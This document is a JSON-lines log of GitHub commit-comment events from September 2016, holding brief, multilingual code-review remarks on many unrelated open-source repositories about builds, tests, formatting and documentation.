{"id":"4618863829","type":"CommitCommentEvent","actor":{"login":"sesva"},"repo":{"name":"sesva/MiPymesCloud"},"payload":{"comment":{"id":19175188,"position":null,"line":null,"path":null,"commit_id":"679d07d266a9a023852293bbb81c5b9fb3a9d5c8","created_at":"2016-09-26T16:22:36Z","updated_at":"2016-09-26T16:22:36Z","body":"Falta solucionar el diseño en móvil..."}},"created_at":"2016-09-26T16:22:36Z"}
{"id":"4618865661","type":"CommitCommentEvent","actor":{"login":"jbscosoft"},"repo":{"name":"aidentumwesigye/PipoServe"},"payload":{"comment":{"id":19175196,"position":null,"line":null,"path":null,"commit_id":"77271bd3803aea935e7abbc0cd8f720ec821f8c6","created_at":"2016-09-26T16:22:57Z","updated_at":"2016-09-26T16:22:57Z","body":"aiden i  have seen it"}},"created_at":"2016-09-26T16:22:57Z"}
{"id":"4618879141","type":"CommitCommentEvent","actor":{"login":"zlsq"},"repo":{"name":"zlsq/hello-world"},"payload":{"comment":{"id":19175224,"position":null,"line":null,"path":null,"commit_id":"446d7820389a5fad1e541bcfe85906e2c9c75c3a","created_at":"2016-09-26T16:25:20Z","updated_at":"2016-09-26T16:25:20Z","body":"hi，github"}},"created_at":"2016-09-26T16:25:20Z"}
{"id":"4618880695","type":"CommitCommentEvent","actor":{"login":"hahn-kev"},"repo":{"name":"hahn-kev/qtcreator-project-structure"},"payload":{"comment":{"id":19175226,"position":null,"line":null,"path":null,"commit_id":"c9622d04d9758aeff0ed8e7ef2d3545f25979b2c","created_at":"2016-09-26T16:25:37Z","updated_at":"2016-09-26T16:25:37Z","body":"The weird thing was that this was during build. However, I just reverted it and it seems like it's working fine with either revision of my project file. I haven't tried to build on Linux, however I've tested it out on Mac and the original configuration is the only one that works, I was having issues on windows."}},"created_at":"2016-09-26T16:25:37Z"}
{"id":"4618882841","type":"CommitCommentEvent","actor":{"login":"bobwei"},"repo":{"name":"iwantooxxoox/leetcode"},"payload":{"comment":{"id":19175236,"position":null,"line":null,"path":null,"commit_id":"be7a200c6518e8d997b2cd75511a559f1333ca72","created_at":"2016-09-26T16:25:59Z","updated_at":"2016-09-26T16:25:59Z","body":"Would you like to try this one again ? XD\r\nhttps://leetcode.com/problems/permutations-ii/"}},"created_at":"2016-09-26T16:25:59Z"}
{"id":"4618885127","type":"CommitCommentEvent","actor":{"login":"gregstein"},"repo":{"name":"ahmedkaludi/Accelerated-Mobile-Pages"},"payload":{"comment":{"id":19175241,"position":null,"line":null,"path":null,"commit_id":"2ab15e59b38242cd20f10df66ec63da703f79573","created_at":"2016-09-26T16:26:24Z","updated_at":"2016-09-26T16:26:24Z","body":"Outstanding!!! I am glad this feature is finally implemented <3"}},"created_at":"2016-09-26T16:26:24Z"}
{"id":"4618886007","type":"CommitCommentEvent","actor":{"login":"cyphermox"},"repo":{"name":"CanonicalLtd/subiquity"},"payload":{"comment":{"id":19175243,"position":5,"line":674,"path":"subiquitycore/models/network.py","commit_id":"ba51edff75cd60641d9796ada5c4187c58b9f6fb","created_at":"2016-09-26T16:26:35Z","updated_at":"2016-09-26T16:26:35Z","body":"I think we need both. It is possible (at least on my test system), to have the ESSID configured, but no IP addresses set. This is effectively a \"do not configure\", as we hit \"Do not configure\" for the IPv4 and IPv6 settings."}},"created_at":"2016-09-26T16:26:35Z"}
{"id":"4618886948","type":"CommitCommentEvent","actor":{"login":"alban"},"repo":{"name":"alepuccetti/scope-traffic-control"},"payload":{"comment":{"id":19175246,"position":59,"line":23,"path":"circle.yml","commit_id":"b49fe548b9da7df1e10e9cce6c1633c7d97183d9","created_at":"2016-09-26T16:26:44Z","updated_at":"2016-09-26T16:26:44Z","body":"It probably does not need to be in the \"test\" section since it is about the build and not the tests.\r\n\r\nIn Scope, it was in the \"test\" section to benefit from the parallel testing features of CircleCI, but here you are not using those parallel features."}},"created_at":"2016-09-26T16:26:44Z"}
{"id":"4618887027","type":"CommitCommentEvent","actor":{"login":"alepuccetti"},"repo":{"name":"alepuccetti/scope-traffic-control"},"payload":{"comment":{"id":19175247,"position":27,"line":19,"path":"circle.yml","commit_id":"b49fe548b9da7df1e10e9cce6c1633c7d97183d9","created_at":"2016-09-26T16:26:44Z","updated_at":"2016-09-26T16:26:44Z","body":"probaly not"}},"created_at":"2016-09-26T16:26:44Z"}
{"id":"4618887571","type":"CommitCommentEvent","actor":{"login":"pnorman"},"repo":{"name":"openstreetmap/openstreetmap-website"},"payload":{"comment":{"id":19175249,"position":null,"line":null,"path":null,"commit_id":"fdcd867de6574688935458f3c099beb5987a1c6e","created_at":"2016-09-26T16:26:51Z","updated_at":"2016-09-26T16:26:51Z","body":"The scope of the OWG explicitly excludes authoring software. Is this a good contact for the proposed code of conduct, and have you checked with them?"}},"created_at":"2016-09-26T16:26:51Z"}
{"id":"4618897824","type":"CommitCommentEvent","actor":{"login":"voutilad"},"repo":{"name":"freelawproject/seal-rookery"},"payload":{"comment":{"id":19175276,"position":null,"line":null,"path":null,"commit_id":"27d0cdb72d346cdfa4a3941ffda42b18068d2e2d","created_at":"2016-09-26T16:28:41Z","updated_at":"2016-09-26T16:28:41Z","body":"I believe that breaks the tests, though?\r\n\r\nI have an update that I'll open a PR with in a few moments if the tests are passing on my end."}},"created_at":"2016-09-26T16:28:41Z"}
{"id":"4618901748","type":"CommitCommentEvent","actor":{"login":"mlissner"},"repo":{"name":"freelawproject/seal-rookery"},"payload":{"comment":{"id":19175289,"position":null,"line":null,"path":null,"commit_id":"27d0cdb72d346cdfa4a3941ffda42b18068d2e2d","created_at":"2016-09-26T16:29:23Z","updated_at":"2016-09-26T16:29:23Z","body":"Oh, it certainly could. I admit, I didn't even check. It was a horrible upgrade."}},"created_at":"2016-09-26T16:29:23Z"}
{"id":"4618902509","type":"CommitCommentEvent","actor":{"login":"Ordenkrieger"},"repo":{"name":"SarthakNarang/Local_Manifest"},"payload":{"comment":{"id":19175291,"position":null,"line":null,"path":null,"commit_id":"a6ac22a606f9f733c8d10554baffd30874ea4c83","created_at":"2016-09-26T16:29:31Z","updated_at":"2016-09-26T16:29:31Z","body":"@SarthakNarang Did you do any changes to frameworks/av to get the camera working? When i try to take a photo the camera frezze/hangs."}},"created_at":"2016-09-26T16:29:31Z"}
{"id":"4618912463","type":"CommitCommentEvent","actor":{"login":"EinarasGar"},"repo":{"name":"EinarasGar/ArduPlayer"},"payload":{"comment":{"id":19175307,"position":null,"line":null,"path":null,"commit_id":"efc8694953cf6d666d9217735c7c6a90463dee78","created_at":"2016-09-26T16:31:15Z","updated_at":"2016-09-26T16:31:15Z","body":"Code for the big cube was taken from [Vbforums](https://goo.gl/NKdN8j) . Then the code was translated from VB to C# . Then code was modified to make 125 little cubes and allowing to click on each of them."}},"created_at":"2016-09-26T16:31:15Z"}
{"id":"4618914816","type":"CommitCommentEvent","actor":{"login":"YvesHenri"},"repo":{"name":"javajohnHub/PokemonGo-Bot"},"payload":{"comment":{"id":19175320,"position":null,"line":null,"path":null,"commit_id":"d55406be72ddf099eed5f119e7057d7e83c9b09c","created_at":"2016-09-26T16:31:40Z","updated_at":"2016-09-26T16:31:40Z","body":"How does this fix 5684? You're not even calling the base constructor (which calls the abstract initialize())."}},"created_at":"2016-09-26T16:31:40Z"}
{"id":"4618922946","type":"CommitCommentEvent","actor":{"login":"PaulSMilne"},"repo":{"name":"PaulSMilne/git_homework"},"payload":{"comment":{"id":19175332,"position":null,"line":null,"path":null,"commit_id":"08a08bd64805b42d281551593fa423830aedd08c","created_at":"2016-09-26T16:32:59Z","updated_at":"2016-09-26T16:32:59Z","body":"I added this without have made changes in my remote git. No internet here so I'll commit the changed files as soon as I get home."}},"created_at":"2016-09-26T16:32:59Z"}
{"id":"4618927226","type":"CommitCommentEvent","actor":{"login":"breakwa11"},"repo":{"name":"wuxinwei/gfw_whitelist_for_shadowsocks"},"payload":{"comment":{"id":19175336,"position":null,"line":null,"path":null,"commit_id":"8a1f0e029ca050ccdd925e32a6f64e17687d439d","created_at":"2016-09-26T16:33:28Z","updated_at":"2016-09-26T16:33:28Z","body":"我觉得如果你不fork，那么在base on这里至少要添加一行，而不是删除？"}},"created_at":"2016-09-26T16:33:28Z"}
{"id":"4618939888","type":"CommitCommentEvent","actor":{"login":"LebedevRI"},"repo":{"name":"darktable-org/darktable"},"payload":{"comment":{"id":19175352,"position":null,"line":null,"path":null,"commit_id":"46a8df52085b7ed05747b0d171ec766e6fbf633c","created_at":"2016-09-26T16:34:47Z","updated_at":"2016-09-26T16:34:47Z","body":"@TurboGit thank you. i don't currently have opencl setup, so all opencl in that pr was purely written without any testing whatsoever.\r\n\r\nShould figure out how to make clang compile opencl, and add that to cmake..."}},"created_at":"2016-09-26T16:34:47Z"}
{"id":"4618943442","type":"CommitCommentEvent","actor":{"login":"electricSemyon"},"repo":{"name":"electricSemyon/vk-intersect"},"payload":{"comment":{"id":19175363,"position":7,"line":9,"path":"package.json","commit_id":"72bc94122a5f31ae765cabed26c0d404e3c8d6e8","created_at":"2016-09-26T16:35:16Z","updated_at":"2016-09-26T16:35:16Z","body":"Fixed!"}},"created_at":"2016-09-26T16:35:16Z"}
{"id":"4618945918","type":"CommitCommentEvent","actor":{"login":"AndyBauleni"},"repo":{"name":"AndyBauleni/datasciencecoursera"},"payload":{"comment":{"id":19175369,"position":null,"line":null,"path":null,"commit_id":"f24fc4eb009b1d144788aa86ea8784c848fcf482","created_at":"2016-09-26T16:35:39Z","updated_at":"2016-09-26T16:35:39Z","body":"Getting and Cleaning Data"}},"created_at":"2016-09-26T16:35:39Z"}
{"id":"4618955609","type":"CommitCommentEvent","actor":{"login":"perrozzi"},"repo":{"name":"perrozzi/cmg-cmssw"},"payload":{"comment":{"id":19175388,"position":4,"line":127,"path":"CMGTools/RootTools/python/fwlite/Looper.py","commit_id":"6ca054e3106ed01be70ca19f089e857244e1d9f7","created_at":"2016-09-26T16:37:23Z","updated_at":"2016-09-26T16:37:23Z","body":"watch out because event weight can be +/-1"}},"created_at":"2016-09-26T16:37:23Z"}
{"id":"4618959073","type":"CommitCommentEvent","actor":{"login":"lukovkin"},"repo":{"name":"tboquet/keras"},"payload":{"comment":{"id":19175393,"position":23,"line":44,"path":"examples/variational_autoencoder.py","commit_id":"05e727f6bc7cf272a6c63bc998040aa0b231e5b9","created_at":"2016-09-26T16:37:56Z","updated_at":"2016-09-26T16:37:56Z","body":"Are we sure about the removal of the multiplication by the original_dim?\r\nThere were no multiplication originally, @RuiShu added it in the #3220 and has some arguments do do it."}},"created_at":"2016-09-26T16:37:56Z"}
{"id":"4618959819","type":"CommitCommentEvent","actor":{"login":"asfernandes"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":19175395,"position":5,"line":2027,"path":"src/burp/backup.epp","commit_id":"7d7ba1aad2c519abf090cd117675f8119e6b3f6a","created_at":"2016-09-26T16:38:04Z","updated_at":"2016-09-26T16:38:04Z","body":"?????"}},"created_at":"2016-09-26T16:38:04Z"}
{"id":"4618964398","type":"CommitCommentEvent","actor":{"login":"EerieCode"},"repo":{"name":"EerieCode/EC3"},"payload":{"comment":{"id":19175402,"position":null,"line":null,"path":null,"commit_id":"ab76f8130db4cf660c63b882a66f63b4de4a304d","created_at":"2016-09-26T16:38:56Z","updated_at":"2016-09-26T16:38:56Z","body":"I'm not particularly fond of using workarounds like that if I can help it: aside from having to rewrite all compatible monsters for that, what if Konami decides effects like this are going to be more common from now on? It's not like we could possibly rewrite every Xyz Monster every time to accomodate effects like these, right?\r\nThe idea of this script is simply to check summoned monsters and effects that attach other cards, the same thing an hypotethical EVENT_ATTACH event would do. If this works, the only cards that'd need to be updated would be those whose effects can attach other monsters as Xyz Materials, and the change would be a single RaiseEvent() like the one in Viper's first effect: I've checked, the only ones that could work with this archetype are \"Overlay Eater\", \"Numbers Overlay Boost\" and \"Xyz Revenge\". IMO, it's always better to make things as general as possible: it makes things so much easier in the long run."}},"created_at":"2016-09-26T16:38:56Z"}
{"id":"4618965302","type":"CommitCommentEvent","actor":{"login":"jlandon"},"repo":{"name":"ovenbits/ModelRocket"},"payload":{"comment":{"id":19175406,"position":8,"line":31,"path":"Sources/JSONTransformable.swift","commit_id":"a238a56d1ea5b24db7d573d2a4382a8890f01165","created_at":"2016-09-26T16:39:06Z","updated_at":"2016-09-26T16:39:06Z","body":"Hmm... 🤔 NSCoding is the only test that fails when `JSONTransformable` uses a generic constraint, but I'd like to keep support for that going forward, if possible. I'll spend some time later tonight thinking through possible solutions"}},"created_at":"2016-09-26T16:39:06Z"}
{"id":"4618967810","type":"CommitCommentEvent","actor":{"login":"blackarcher21"},"repo":{"name":"kasper93/mpc-hc"},"payload":{"comment":{"id":19175420,"position":null,"line":null,"path":null,"commit_id":"70ae36a9908fee27b43425d0fd4efd9f27719808","created_at":"2016-09-26T16:39:33Z","updated_at":"2016-09-26T16:39:33Z","body":"Changelog.txt needs to be updated as well :)"}},"created_at":"2016-09-26T16:39:33Z"}
{"id":"4618971064","type":"CommitCommentEvent","actor":{"login":"vobruba-martin"},"repo":{"name":"google/closure-compiler"},"payload":{"comment":{"id":19175428,"position":null,"line":null,"path":null,"commit_id":"82f23897059d244d793518a1355fe2e1cc0ba80f","created_at":"2016-09-26T16:40:08Z","updated_at":"2016-09-26T16:40:08Z","body":"Yes, I'm using NTI.\r\n\r\nI've tested another smaller project and I saw the typed percentage decrease without affecting the compiled code size.\r\n\r\nIt looks like CC loses some type info which is used when `--use_types_for_optimization` is enabled. If I disable `--use_types_for_optimization` I get the same result as if it is enabled. Before this commit I was getting a smaller compiled code with `--use_types_for_optimization`.\r\n\r\nI will try to reproduce this in a smaller code tomorrow. Do you have any code examples for `--use_types_for_optimization`? Maybe it can be a good point to start at."}},"created_at":"2016-09-26T16:40:08Z"}
{"id":"4618972640","type":"CommitCommentEvent","actor":{"login":"JemmaQue"},"repo":{"name":"JemmaQue/swift"},"payload":{"comment":{"id":19175435,"position":null,"line":null,"path":null,"commit_id":"992055d05843bccae0b57538be1fba3cdd6b5693","created_at":"2016-09-26T16:40:25Z","updated_at":"2016-09-26T16:40:25Z","body":"https://dl.dropboxusercontent.com/s/op94wjekagymowx/3794F75A-64AE-4CC0-8EE0-D8D2CAB6D872-5241-00000FA3123B7F3F.gif?dl=0"}},"created_at":"2016-09-26T16:40:25Z"}
{"id":"4618975486","type":"CommitCommentEvent","actor":{"login":"asfernandes"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":19175442,"position":9,"line":190,"path":"src/burp/restore.epp","commit_id":"eb645f3b944cd65864e69e9b3af278572995b9a7","created_at":"2016-09-26T16:40:56Z","updated_at":"2016-09-26T16:40:56Z","body":"Instead of duplicate the \"get\" method to insert a cast, wouldn't be much better to just cast the call to \"get\" in get_boolean?"}},"created_at":"2016-09-26T16:40:56Z"}
{"id":"4618975640","type":"CommitCommentEvent","actor":{"login":"Writtic"},"repo":{"name":"ENOW-IJI/ENOW-server"},"payload":{"comment":{"id":19175444,"position":null,"line":null,"path":null,"commit_id":"d023ac7efdc58371c8a628efd0ce78436945505f","created_at":"2016-09-26T16:40:58Z","updated_at":"2016-09-26T16:40:58Z","body":"LGTM:+1:"}},"created_at":"2016-09-26T16:40:58Z"}
{"id":"4618976369","type":"CommitCommentEvent","actor":{"login":"kreeger"},"repo":{"name":"ovenbits/ModelRocket"},"payload":{"comment":{"id":19175446,"position":8,"line":31,"path":"Sources/JSONTransformable.swift","commit_id":"a238a56d1ea5b24db7d573d2a4382a8890f01165","created_at":"2016-09-26T16:41:07Z","updated_at":"2016-09-26T16:41:07Z","body":"For whatever it's worth, I've got a branch of my own (unfortunately also called `swift3`, at https://github.com/kreeger/modelrocket/tree/swift3) that seems to compile just fine when used as a dependency, but I've not tried the unit tests yet, I don't think."}},"created_at":"2016-09-26T16:41:07Z"}
{"id":"4618982917","type":"CommitCommentEvent","actor":{"login":"phunghv"},"repo":{"name":"phunghv/phunghv.github.io"},"payload":{"comment":{"id":19175454,"position":4,"line":4,"path":"_layouts/home.html","commit_id":"c8d2fd7424ec9f8c873bbc12aca7f33aa040f2c5","created_at":"2016-09-26T16:42:22Z","updated_at":"2016-09-26T16:42:22Z","body":"ahihih \r\n"}},"created_at":"2016-09-26T16:42:22Z"}
{"id":"4618984615","type":"CommitCommentEvent","actor":{"login":"mercury233"},"repo":{"name":"EerieCode/EC3"},"payload":{"comment":{"id":19175457,"position":null,"line":null,"path":null,"commit_id":"ab76f8130db4cf660c63b882a66f63b4de4a304d","created_at":"2016-09-26T16:42:39Z","updated_at":"2016-09-26T16:42:39Z","body":"I mean, attach the effect to any beast-warrior xyz monster when it spsummon, like I do in\r\nhttps://github.com/Fluorohydride/ygopro-pre-script/blob/master/scripts/RATE-JP/c100911014.lua"}},"created_at":"2016-09-26T16:42:39Z"}
{"id":"4618986471","type":"CommitCommentEvent","actor":{"login":"wdlkmpx"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":19175459,"position":null,"line":null,"path":null,"commit_id":"81d8d031482691f7d0f62d56ef41a29dc85049bd","created_at":"2016-09-26T16:43:02Z","updated_at":"2016-09-26T16:43:02Z","body":"i guess it can not open index.html because the file has javascript. that file requires a tiny browser, the only (good) tiny browser i know is dillo. dillo ignores javascript, but loads all the rest in a microsecond. it's about 900kb in size (static fltk - in precise at least), and about 350kb compressed. it fact it can load a wide range of pages, it's pretty good for its size. i'd say incredibly good, sometimes i use it to browse the web.\r\n\r\ni think a splash will not work, unless there's a timer to stop it. a spinning cursor is a good idea.. maybe a way to tell xorg to change the cursor icon to \"busy\" for a moment... but how?"}},"created_at":"2016-09-26T16:43:02Z"}
{"id":"4618987060","type":"CommitCommentEvent","actor":{"login":"macool"},"repo":{"name":"noggalito/porttare-frontend"},"payload":{"comment":{"id":19175460,"position":30,"line":69,"path":"app/scripts/controllers/clients-controller.js","commit_id":"c255bdb4c87e36095101c1c5c6cae9a1554b6710","created_at":"2016-09-26T16:43:09Z","updated_at":"2016-09-26T16:43:09Z","body":"+1. filter de ES y no de angular"}},"created_at":"2016-09-26T16:43:09Z"}
{"id":"4618987981","type":"CommitCommentEvent","actor":{"login":"KaiKikuchi"},"repo":{"name":"KaiKikuchi/GriefPreventionPlus"},"payload":{"comment":{"id":19175464,"position":null,"line":null,"path":null,"commit_id":"bb5152587fabc980713f5b97f0d59bc9529fc08b","created_at":"2016-09-26T16:43:18Z","updated_at":"2016-09-26T16:43:18Z","body":"This is considered a staff-only command."}},"created_at":"2016-09-26T16:43:18Z"}
{"id":"4618989171","type":"CommitCommentEvent","actor":{"login":"hsingh23"},"repo":{"name":"swagger-api/swagger-js"},"payload":{"comment":{"id":19175468,"position":7,"line":321,"path":"lib/client.js","commit_id":"535d505cc40314be5b0d010796cc9431d9d8ee3a","created_at":"2016-09-26T16:43:30Z","updated_at":"2016-09-26T16:43:30Z","body":"do you mean `window.location.protocol.replace(':','');`"}},"created_at":"2016-09-26T16:43:30Z"}
{"id":"4618996440","type":"CommitCommentEvent","actor":{"login":"TurboGit"},"repo":{"name":"darktable-org/darktable"},"payload":{"comment":{"id":19175480,"position":null,"line":null,"path":null,"commit_id":"46a8df52085b7ed05747b0d171ec766e6fbf633c","created_at":"2016-09-26T16:44:46Z","updated_at":"2016-09-26T16:44:46Z","body":"No problem, I found that after recompiling my darktable it was quite slow... After investigation I found that the OpenCL code was not compiled properly and so disabled at runtime. The fix was trivial..."}},"created_at":"2016-09-26T16:44:46Z"}
{"id":"4618996830","type":"CommitCommentEvent","actor":{"login":"macool"},"repo":{"name":"noggalito/porttare-frontend"},"payload":{"comment":{"id":19175481,"position":30,"line":69,"path":"app/scripts/controllers/clients-controller.js","commit_id":"c255bdb4c87e36095101c1c5c6cae9a1554b6710","created_at":"2016-09-26T16:44:51Z","updated_at":"2016-09-26T16:44:51Z","body":"http://www.ecma-international.org/ecma-262/5.1/#sec-15.4.4.20"}},"created_at":"2016-09-26T16:44:51Z"}
{"id":"4618997608","type":"CommitCommentEvent","actor":{"login":"macool"},"repo":{"name":"noggalito/porttare-frontend"},"payload":{"comment":{"id":19175486,"position":30,"line":69,"path":"app/scripts/controllers/clients-controller.js","commit_id":"c255bdb4c87e36095101c1c5c6cae9a1554b6710","created_at":"2016-09-26T16:44:58Z","updated_at":"2016-09-26T16:44:58Z","body":"https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/filter"}},"created_at":"2016-09-26T16:44:58Z"}
{"id":"4618999518","type":"CommitCommentEvent","actor":{"login":"jlandon"},"repo":{"name":"ovenbits/ModelRocket"},"payload":{"comment":{"id":19175489,"position":8,"line":31,"path":"Sources/JSONTransformable.swift","commit_id":"a238a56d1ea5b24db7d573d2a4382a8890f01165","created_at":"2016-09-26T16:45:20Z","updated_at":"2016-09-26T16:45:20Z","body":"Yeah, it compiles fine, but the NSCoding test fails on enums with a `[_SwiftValue encodeWithCoder:]: unrecognized selector sent to instance` exception"}},"created_at":"2016-09-26T16:45:20Z"}
{"id":"4619006654","type":"CommitCommentEvent","actor":{"login":"garpinc"},"repo":{"name":"pac4j/spring-security-pac4j"},"payload":{"comment":{"id":19175503,"position":null,"line":null,"path":null,"commit_id":"2d0d5923c0a9a60e000261e12c96947374399dc5","created_at":"2016-09-26T16:46:39Z","updated_at":"2016-09-26T16:46:39Z","body":"Hey.. why did you remove the osgi manifest stuff in the new release?"}},"created_at":"2016-09-26T16:46:39Z"}
{"id":"4619012255","type":"CommitCommentEvent","actor":{"login":"thomasdarimont"},"repo":{"name":"spring-projects/spring-security"},"payload":{"comment":{"id":19175514,"position":null,"line":null,"path":null,"commit_id":"e297706e8bfda38117a99fd06dace74c5a8cc5f1","created_at":"2016-09-26T16:47:35Z","updated_at":"2016-09-26T16:47:35Z","body":"Just stumbled over this whilst reading the \"What's new in Spring Security 4.2\" issue list.\r\n\r\nShouldn't the documentation rather say:\r\n```\r\nDefaults to \"1\". A value of \"-1\" denotes unlimitted sessions.\r\n```\r\nSince \"any\" other negative value than -1 would trigger different behaviour, see:\r\n[ConcurrentSessionControlAuthenticationStrategy](https://github.com/spring-projects/spring-security/blob/ce20cfcb9803a6175f6befc9008cadcc4e3b6d72/web/src/main/java/org/springframework/security/web/authentication/session/ConcurrentSessionControlAuthenticationStrategy.java#L102)"}},"created_at":"2016-09-26T16:47:35Z"}
{"id":"4619014843","type":"CommitCommentEvent","actor":{"login":"poulson"},"repo":{"name":"xdata-skylark/libskylark"},"payload":{"comment":{"id":19175522,"position":null,"line":null,"path":null,"commit_id":"b8b4c13369d79ab7a586d24a089bc44184cf4ae6","created_at":"2016-09-26T16:48:01Z","updated_at":"2016-09-26T16:48:01Z","body":"FWIW, the new distributed SVD should be expected to have been sped up several fold due to the new Divide and Conquer."}},"created_at":"2016-09-26T16:48:01Z"}
{"id":"4619015193","type":"CommitCommentEvent","actor":{"login":"ncharles"},"repo":{"name":"amousset/rudder-techniques"},"payload":{"comment":{"id":19175524,"position":null,"line":null,"path":null,"commit_id":"6dcf01e9c38371c9401a0cfe67e7e8d1658a5547","created_at":"2016-09-26T16:48:05Z","updated_at":"2016-09-26T16:48:05Z","body":"Don't forget the maintained-techniques file !"}},"created_at":"2016-09-26T16:48:05Z"}
{"id":"4619015666","type":"CommitCommentEvent","actor":{"login":"zsummer"},"repo":{"name":"zsummer/log4z"},"payload":{"comment":{"id":19175526,"position":null,"line":null,"path":null,"commit_id":"36060939694cfad14486156f3e308f2eb614b53b","created_at":"2016-09-26T16:48:10Z","updated_at":"2016-09-26T16:48:10Z","body":"thanks this : https://github.com/dnybz/log4z/commit/319c6c571a31f1aa90de6581f5c93780eec01097  \r\n:+1: \r\n"}},"created_at":"2016-09-26T16:48:10Z"}
{"id":"4619020630","type":"CommitCommentEvent","actor":{"login":"pedrommone"},"repo":{"name":"codecasts/codecasts"},"payload":{"comment":{"id":19175537,"position":16,"line":16,"path":"app/Domains/Podcasts/Listeners/IncrementsTimesDownloaded.php","commit_id":"5ecb9e6f2b692d2f47804b199c2c9c10cc8f0fcc","created_at":"2016-09-26T16:49:01Z","updated_at":"2016-09-26T16:49:01Z","body":"@hernandev when I get some time I'll try to do something."}},"created_at":"2016-09-26T16:49:01Z"}
{"id":"4619022963","type":"CommitCommentEvent","actor":{"login":"twhiteman"},"repo":{"name":"Komodo/KomodoEdit"},"payload":{"comment":{"id":19175549,"position":null,"line":null,"path":null,"commit_id":"d67cc172bf352719c36707007fe096d425742fa7","created_at":"2016-09-26T16:49:27Z","updated_at":"2016-09-26T16:49:27Z","body":"I would think that it was a performance tweak (probably for typing or scrolling responsiveness), so that the doUpdateUI work (which is significant) does not get run too often."}},"created_at":"2016-09-26T16:49:27Z"}
{"id":"4619023062","type":"CommitCommentEvent","actor":{"login":"ncharles"},"repo":{"name":"amousset/rudder-techniques"},"payload":{"comment":{"id":19175550,"position":25,"line":25,"path":"techniques/applications/packageManagement/1.0/packageManagement.st","commit_id":"6dcf01e9c38371c9401a0cfe67e7e8d1658a5547","created_at":"2016-09-26T16:49:28Z","updated_at":"2016-09-26T16:49:28Z","body":"it should be i0"}},"created_at":"2016-09-26T16:49:28Z"}
{"id":"4619023735","type":"CommitCommentEvent","actor":{"login":"Wohlstand"},"repo":{"name":"WohlSoft/PGE-Project"},"payload":{"comment":{"id":19175551,"position":8,"line":0,"path":"Engine/scenes/scene.h","commit_id":"afa50516b83f2b26541f6193bf8e0719fbc78e3b","created_at":"2016-09-26T16:49:36Z","updated_at":"2016-09-26T16:49:36Z","body":"The thing is: if using a priority-based functions, I still need to remember wish to draw that, sort by z Index and then draw stuff. Also I must keep drawn stuff in case of spawned message boxes which are calling render() function of parent scene"}},"created_at":"2016-09-26T16:49:36Z"}
{"id":"4619027373","type":"CommitCommentEvent","actor":{"login":"gizzmojr"},"repo":{"name":"leif81/bzkanban"},"payload":{"comment":{"id":19175556,"position":null,"line":null,"path":null,"commit_id":"c1ad7a3ce12eae50e3d762862fa4281fe60134e9","created_at":"2016-09-26T16:50:15Z","updated_at":"2016-09-26T16:50:15Z","body":"Done"}},"created_at":"2016-09-26T16:50:15Z"}
{"id":"4619031095","type":"CommitCommentEvent","actor":{"login":"Shivprakash"},"repo":{"name":"Kshreyans/CodeArea-1-"},"payload":{"comment":{"id":19175562,"position":1,"line":1,"path":"swap_LL.c","commit_id":"760f4c618a1c6e9348aab7924d8109b379eb5d93","created_at":"2016-09-26T16:50:57Z","updated_at":"2016-09-26T16:50:57Z","body":"Write file level comment . "}},"created_at":"2016-09-26T16:50:57Z"}
{"id":"4619034976","type":"CommitCommentEvent","actor":{"login":"MagdalenaMileto"},"repo":{"name":"paturlannem/tpObjetosPdeP"},"payload":{"comment":{"id":19175573,"position":null,"line":null,"path":null,"commit_id":"5a31e5fccfa10607cea4cc9fe10cfd01562a02a3","created_at":"2016-09-26T16:51:39Z","updated_at":"2016-09-26T16:51:39Z","body":"Ya sin ver mucho el código te puedo decir: ¡Romper con el polimorfismo es una decisión incorrecta! Todos los sims, sin importar su personalidad tienen que entender el mismo mensaje: leAtrae. Después, y dentro de esas personalidades, cada sim actuará dependiendo de lo que esté dentro.\r\n\r\nFijense el contexto general antes de cambiar el código; ahora, y con este cambio incorrecto, le estan quitando la posibilidad de entrar por la clase interesado cuando queramos saber si a un sim le atrae alguien.\r\n\r\n¡Recuerden cambiar leGusta por leAtrae!"}},"created_at":"2016-09-26T16:51:39Z"}
{"id":"4619035898","type":"CommitCommentEvent","actor":{"login":"japj91"},"repo":{"name":"japj91/CITLab3"},"payload":{"comment":{"id":19175577,"position":null,"line":null,"path":null,"commit_id":"a707262f99bf613cf61234ea88d074b7c798e597","created_at":"2016-09-26T16:51:49Z","updated_at":"2016-09-26T16:51:49Z","body":"excellent comment "}},"created_at":"2016-09-26T16:51:49Z"}
{"id":"4619036076","type":"CommitCommentEvent","actor":{"login":"gialloporpora"},"repo":{"name":"MozillaItalia/morestuffformozita"},"payload":{"comment":{"id":19175578,"position":null,"line":null,"path":null,"commit_id":"4d0c889b74d15ad6cd7aaf11ddbb1940ede1dd6c","created_at":"2016-09-26T16:51:51Z","updated_at":"2016-09-26T16:51:51Z","body":"@kitsunenosarat,\r\ncredo che [dalla discussione sul forum](http://forum.mozillaitalia.org/index.php?topic=67444.0)  emerga una preferenza per il plurale invariato come se fosse un termine straniero.\r\nPer ICYMI ho scelto l'espansione nei contesti dove ciò è possibile, mentre nei tweet usiamo #sapevatelo.\r\n\r\n"}},"created_at":"2016-09-26T16:51:51Z"}
{"id":"4619042097","type":"CommitCommentEvent","actor":{"login":"Shivprakash"},"repo":{"name":"Kshreyans/CodeArea-1-"},"payload":{"comment":{"id":19175589,"position":22,"line":22,"path":"swap_LL.c","commit_id":"760f4c618a1c6e9348aab7924d8109b379eb5d93","created_at":"2016-09-26T16:52:55Z","updated_at":"2016-09-26T16:52:55Z","body":"Use proper indentation in the file, you can use notepad++ or other text editors to format (most  editors come with format plugin.) Use tab when indenting.  \r\nFor figuring out proper way on formatting and use one IDE and short key in that IDE to understand how is the code formatted in standard way."}},"created_at":"2016-09-26T16:52:55Z"}
{"id":"4619044287","type":"CommitCommentEvent","actor":{"login":"ncharles"},"repo":{"name":"amousset/rudder-techniques"},"payload":{"comment":{"id":19175595,"position":null,"line":null,"path":null,"commit_id":"6dcf01e9c38371c9401a0cfe67e7e8d1658a5547","created_at":"2016-09-26T16:53:19Z","updated_at":"2016-09-26T16:53:19Z","body":"so far, this looks great ! thank you for the readable code"}},"created_at":"2016-09-26T16:53:19Z"}
